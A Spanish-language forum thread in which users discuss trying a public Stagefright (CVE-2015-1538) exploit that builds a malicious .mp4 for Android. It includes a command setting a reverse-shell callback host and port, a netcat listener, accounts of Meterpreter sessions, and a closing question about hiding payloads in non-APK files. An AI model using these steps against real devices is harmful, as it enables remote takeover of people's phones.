Es realmente interesante esta vulneravilidad de android que está basada en un bug del sofware multimeda que afecta de la versión 2.2 a la 5.1
https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py (https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py)
Se envia el video en el formato ".mp4" y este contiene el codigo para explotar la vulneravilidad en android y aunque todavia no lo he utlizado me parecio muy interesante y si lo pruebo os comento que tal fué.
Habia oido algo sobre ese bug ahorita lo veo se oye interesante :)
¿Alguien lo ha probado ya?
yo he llegado hasta aqui....vi el post y me parecio interesante..pero a la hora de ejecutar el script me daba errores...este video me ayudo a corregir ciertos errores que me daba al ejecutarlo https://www.youtube.com/watch?v=sQnGyIoNjr8 una vez consegui ejecutar el script segui los pasos, me genero el mp4 y al probarlo ese fue el resultado...no abre ninguna sesion
(http://i.imgur.com/MQ7rsiK.png)
(http://i.imgur.com/Bprw8cR.png)
yo he probado esto..consigo sesion pero se pierde a los pocos segundos..y a la hora de hacer un help en el meterpreter no aparecen opciones como sysinfo getuid shell etc...
(http://i.imgur.com/m00yZDa.png)
(http://i.imgur.com/8GR9VZA.png)
(http://i.imgur.com/g1SKthm.png)
el tio este lo hace desde el modulo ya cargado en metasploit pero yo no consigo cargar el modulo...lo intente haciendo esto
(http://i.imgur.com/RNdLPzr.png)
copie el script a la ruta donde estan los exploits y lo intente ejecutar desde la consola de metasploit pero me aparece como que no encuentra el script
video del tipo ejecutando el modulo en metasploit
https://www.youtube.com/watch?v=dAZ4W6OkkRk
Yo probe con el 38164 y no funciona
mp4.py -c 192.168.0.168 -p 4444
netcat -l -p 4444
Yo tengo android 4.4.2 y no funciona supuestamente es para inferior a 5.0 y tambien probe con los demas exploit y nada
como que tiene muchos bugs ese exploit, o seran a proposito?
Quizas sea a proposito pero se cambia rapido, solo es sustituir unas pocas cosas pero creo que esos errores los parchean enseguida
Yo estoy intentando abrir una sesion meterpreter en un android, pero no se instala la aplicacion .apk. ¿Alguien sabe por que?
También estoy buscando como añadir el payload en otro archivo que no sea apk, como en el caso de este post, crea un archivo mp4.